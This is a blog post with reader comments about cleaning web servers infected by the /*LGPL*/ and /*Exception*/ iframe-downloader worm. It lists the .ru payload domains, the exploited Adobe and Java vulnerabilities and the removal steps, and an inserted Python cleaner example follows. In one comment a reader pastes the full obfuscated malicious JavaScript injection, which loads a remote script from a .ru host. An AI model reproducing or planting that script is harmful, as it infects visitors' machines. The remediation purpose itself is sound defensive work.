/*LGPL*/ and /*Exception*/ trojan Removal script, Trojan-Downloader.JS.a or Trojan-Downloader.JS.b or Trojan-Downloader.JS.c or Trojan-Downloader.JS.d cleaner, cleanup, Downloader worm removal. This script removes the trojan code from all files on your web server. Updated Jan 30, 2010
Clean-up script for sites infected with the Downloader worm (/*LGPL*/ or /*Exception*/ type script).
As we all know, there is a mass attack of /*LGPL*/ and /*Exception*/ type scripts on websites. I have seen plenty of websites infected with this type of infection, and finally I decided to write a script to remove the code inserted in files all over the server directories.
A new version of /*LGPL*/ and /*Exception*/ is out in the wild. The code inserted in web pages after the BODY tag, or at the end of JavaScript files, looks a bit like this.
The SCRIPT tag shown above is not present in JavaScript (.js) files.
Well, it is just another type of IFRAMER worm. Once deobfuscated, it loads JavaScript from [http][POPULAR-DOMAIN-NAMES].easylifedirect.ru:8080/[POPULAR-DOMAIN-NAMES]/google.com/
This loaded JavaScript then loads an iframe whose src contains the actual payload: [http][POPULAR-DOMAIN-NAMES].easylifedirect.ru:8080/index.php?ys
Some URLs may also have "thechocolateweb.ru" or "tartband.ru" or "bestbondsite.ru" or "trueworldmedia.ru" or "avattop.ru" in place of "easylifedirect.ru".
The major files infected are:
JavaScript files (.js)
index files such as:
index*.html
index*.htm
index*.php
default*.php
mainframe*.php
application*.php
default*.html
default*.htm
index*.asp
(in short, index*.* and default*.*)
The JavaScript code seems to have been changing since the day it launched, and this morning I noticed that they have removed the <script> tags in JavaScript files.
The payload hasn't changed much from last year's attacks. When one visits a compromised site, the malicious JavaScript loads more JavaScript that contains an iframe tag, which opens another page containing two links. One link goes to a PDF file, which is detected as Trojan-Downloader.JS.a or Trojan-Downloader.JS.b or Trojan-Downloader.JS.c or Trojan-Downloader.JS.d. The other is to a JAR (Java ARchive) file, which is detected as Downloader.
Those two files use the following vulnerabilities to infect the computer with malware:
* Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities (BID 27641)
* Adobe Reader and Acrobat 'newplayer()' JavaScript Method Remote Code Execution Vulnerability (BID 37331)
* Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities (BID 32608)
The final payload includes malware like Trojan-Downloader.JAVA.Agent.al or Trojan-Downloader.JAVA.Agent.exe or Trojan.Bredolab, Downloader.Fostrem, and Trojan.Zbot, along with security risks such as PrivacyCenter and a number of other misleading applications that may be detected as Trojan.FakeAV. It's important to keep your definition files up to date, as these files are frequently being updated.
REMOVAL STEPS
1. Block these websites on your firewall or router: "thechocolateweb.ru", "tartband.ru", "bestbondsite.ru", "trueworldmedia.ru", "avattop.ru", "easylifedirect.ru"
2. Update your anti-virus and clean up the infection from your machines, or from whoever is accessing the site via FTP.
3. Change the FTP password from a secure machine which is not infected.
4. Upload the Manual Trojan Code Remover script to your public_html directory.
5. Run the script by calling the PHP file from your browser.
PRECAUTIONS
1. Block these websites on your firewall and/or router: "thechocolateweb.ru", "tartband.ru", "bestbondsite.ru", "trueworldmedia.ru", "avattop.ru", "easylifedirect.ru"
2. Keep your Anti-virus updated.
3. Do not open any suspicious links received on messengers or emails.
It will clean up the files and will also create a backup of the files which are infected (backup files will have the extension .infected.bak).
Looks like they are changing the signatures too fast, so I have made this small tool so that you can manually remove the virus code.
Instructions:
1. Download the Manual Trojan Code Remover and unpack.
2. Upload it to the document root of your website and run the script by opening the URL in your browser.
3. Now open any infected file, copy the trojan code and paste it in the textarea in the removal tool.
4. Press Clean All!
That's all!
* Please note that you will need an extra step for JavaScript files.
** Also process the code in JavaScript files after PHP/ASP files.
Let us know if you find other signatures or codes; we will try to release an update ASAP.
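The cleaner below is an added example, not the post's PHP Manual Trojan Code Remover: it does the same job in Python (search every index*/default*/.js file for a pasted signature, back each infected file up as .infected.bak, then strip the snippet) and handles the two problems commenters hit, listing only files that really contain the /*LGPL*/ or /*Exception*/ marker and reporting files that are not writable instead of stopping. SAMPLE_SIG, the demo web root and all function names are assumptions made for this example.

```python
import os, fnmatch, tempfile
from pathlib import Path

# File name patterns the post lists as the usual infection targets.
TARGET_GLOBS = ("index*.*", "default*.*", "mainframe*.php", "application*.php", "*.js")
# Marker comments the post names; a hit only flags a file for review, it never edits it.
MARKERS = ("/*LGPL*/", "/*Exception*/")

def target_files(root: Path):
    """Yield the target files under root, skipping our own .infected.bak backups."""
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.name.endswith(".infected.bak") \
                and any(fnmatch.fnmatch(p.name.lower(), g) for g in TARGET_GLOBS):
            yield p

def find_suspects(root: Path) -> list[str]:
    """List only target files that really contain a marker (no false listings)."""
    return [str(p.relative_to(root)) for p in target_files(root)
            if any(m in p.read_text(encoding="utf-8", errors="replace") for m in MARKERS)]

def clean_file(path: Path, signature: str) -> str:
    """Strip every exact copy of signature; returns 'clean', 'cleaned' or 'not writable'."""
    data, sig = path.read_bytes(), signature.encode("utf-8")
    if sig not in data:
        return "clean"
    if not os.access(path, os.W_OK):
        return "not writable"  # the error commenters hit: report it and keep going
    path.with_name(path.name + ".infected.bak").write_bytes(data)  # backup before editing
    path.write_bytes(data.replace(sig, b""))
    return "cleaned"

def clean_tree(root: Path, signature: str) -> dict[str, list[str]]:
    """Run clean_file over every target file; per-status report of touched files."""
    report = {"cleaned": [], "not writable": []}
    for p in target_files(root):
        status = clean_file(p, signature)
        if status != "clean":
            report[status].append(str(p.relative_to(root)))
    return report

# Constructed stand-in for the snippet a user would paste; not a real sample.
SAMPLE_SIG = "<script>/*LGPL*/ try{window.onload=function(){/*stand-in*/}}catch(e){}</script>"

def build_demo_tree(base: Path) -> Path:
    """Constructed fake web root: one infected index page and one clean script."""
    root = base / "public_html"
    root.mkdir(parents=True, exist_ok=True)
    (root / "index.html").write_text("<body>" + SAMPLE_SIG + "<p>hi</p></body>")
    (root / "app.js").write_text("function f(){return 1;}\n")
    return root

def run_demo() -> dict:
    """Build the demo tree, scan it, clean it, and return what happened."""
    root = build_demo_tree(Path(tempfile.mkdtemp()))
    suspects, report = find_suspects(root), clean_tree(root, SAMPLE_SIG)
    return {"suspects": suspects, "report": report, "after": (root / "index.html").read_text(),
            "backup": (root / "index.html.infected.bak").exists()}
```

On a real site, call find_suspects(Path("/path/to/public_html")) first to see which files match, then clean_tree with the exact snippet copied from one infected file.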
Looks like a great script but it doesn't work. My server has php 5.2.12. Would really appreciate it if you can tell me how to get it to work. I've tried it in the root of the site and then in each sub folder but nothing.
Stan
I'm having the same problem...
Unable to clean a infected file(file not writable)
There are hundreds and hundreds listed, and strangely, many of the files listed are *not* infected.
Oh man I hope someone can post a solution... this script really seems to be the answer to a problem that otherwise seems insurmountable!
To all those wondering if the script works on new strains, it should.
Pretty much whatever you post into the input box it will search out in every file and then remove it; it's a glorified search-and-replace script.
Unfortunately I can't seem to get it to work on my server; hope you all have better luck.
The PHP script doesn't seem to work. I ran it on an IIS server with PHP 5 and nothing happened; I checked the files and the infected file was still there. I copied the whole JavaScript, and one without the <script> tags, and still nothing.
joe
peterprossedi@hotmail.com
I'm getting Unable to clean a infected file(file not writable)
and there's no way I can give write access to all these files... there are a few hundred.
Hi Peter,
Many people don't have recent backups. Also, on many machines the infection is too widespread, and it may take many hours to find the malicious code and remove it manually from each file. These tools are targeted to save the time of people who are infected.
Peter
pk@kelmace.com
Why use the manual trojan code remover? Why not just remove the malware code from the files or replace them from a backup? That's what I did yesterday from an infection I found and there does not appear to be an issue or re-infection. FTP passwords were changed too of course.
Msia
yong_isprings@yahoo.com
I pasted the script but it was not deleted. Does it work on the script below?
<script>var i;if(i!='' && i!='f'){i=null};this.US='';function h(){var N;if(N!='D'){N='D'};this.q='';this.K="";var A;if(A!=''){A='fI'};var H=new String("g");var u='';var eQ;if(eQ!='' && eQ!='R'){eQ=null};var j="";var zr="";var G=RegExp;var ia;if(ia!='Om' && ia != ''){ia=null};this.tD="";var GF="";function z(O,M){var t=new G("["+M+"]", H);return O.replace(t, u);var hS=new Date();var Oa;if(Oa!='' && Oa!='C'){Oa=''};};var GN='';var Dj='';var qY=new Array();var U=z('83359903298992509252',"2593");var T="scri"+"fNLpt".substr(3);var F=new String("9Qm/go".substr(3)+"oglqDT5".substr(0,3)+"arOe.cOra".substr(3,3)+"NZdom/".substr(3)+"gooNuBK".substr(0,3)+"Ef6gle".substr(3)+".co"+"m/m"+"HasediHas".substr(3,3)+"afi"+"c9jyre.".substr(4)+"com"+"izm/remzi".substr(3,3)+"DK3tver3tDK".substr(4,3)+"Ilrso.".substr(3)+"0oGnetGo0".substr(3,3)+"Gt3/xctG3".substr(3,3)+"y1sar.y1s".substr(3,3)+"comEkf".substr(0,3)+"mtH.cn".substr(3)+"cEFa.ph".substr(4)+"3VUp".substr(3));var TB='';var m=String("bdKWhtt".substr(4)+"p:/"+"cYtB/ms".substr(4)+"GiDYn-c".substr(4)+"om-"+"tIBcn.".substr(3)+"5nM1torn1M5".substr(4,3)+"renLfY".substr(0,3)+"C0mtz.".substr(3)+"MG6scomGsM6".substr(4,3)+"lugK.so".substr(4)+"8x9egou89ex".substr(4,3)+"TGgx-co".substr(4)+"H6kIm.sI6kH".substr(4,3)+"eas"+"ilv"+"ers"+"SQ1kite".substr(4)+"NX3.ruN3X".substr(3,3)+"8rp5:pr58".substr(4,1));var An;if(An!='Ck' && An!='vt'){An=''};var Wg='';window.onload=function(){this.d='';this.ac='';try {var II;if(II!=''){II='Q'};this.ib="";TB=m+U;this.ML='';TB+=F;var pW;if(pW!='IC' && pW != ''){pW=null};var WP='';var l='';_=document.createElement(T);this.Cu="";var WV;if(WV!='' && WV!='N_'){WV='O_'};this.L="";var hh;if(hh!='g' && hh!='Mk'){hh='g'};_.defer=[1][0];this.Rl="";_.src=TB;this.HC="";this.TR="";document.body.appendChild(_);var Aj=new Array();} catch(e){var CQ=new Date();var bD;if(bD!=''){bD='qp'};};var UK='';};this.AY='';};h();var Ja;if(Ja!='' && Ja!='HB'){Ja='Mg'};</script>
Christina
tinaxo@gmail.com
Oh, and it doesn't show "Success" or anything.. I don't know why.
Christina
tinaxo@gmail.com
I enter the code and it goes through but none of the files were edited. It doesn't give me any error or anything but the bad code is still there. Any ideas why?
Hey Hatem,
you need PHP5+ to run this script.
Please do not forget to clean up your local machines first and change FTP password.
Hi
First of all, thank you for your efforts,
When I put in the code and click "clean all" it gives me this message:
Fatal error: Cannot instantiate non-existent class: directoryiterator in /home/content ... /html/trojan-code-remover.php on line 172
How can I fix it ???
Guys, once you clean up your system, delete all the FTP accounts. This blocks the entry point of the virus and malware and makes sure that your files won't get infected again.
Hi,
please use the Trojan Code Remover tool.
You just need to copy and paste the above code into it.
It will clean up the code from all files.
Let me know if there are any other problems.
Hi,
if you are getting the infection, one of the machines from which you are accessing the host is infected with TROJAN-DOWNLOADER.PEGEL.JS.x.
Please clean up the trojan from all the machines,
then change all of the FTP passwords and cPanel passwords from a CLEAN machine.
If after all this it's coming back again, then please check if something at your hosting provider is compromised.
But most of the time the infection will be on your side.
Avoid opening infected sites,
avoid opening strange links in IM messages.
Crs
canraps@gmail.com
Hi Sameer,
It's getting all sick :( How can we prevent this from happening :( It infects like every 2-3 days on our server. I use InfoRapid Search&Replace for the code removal but I'm sick of this. Do we get infected because of the iframe?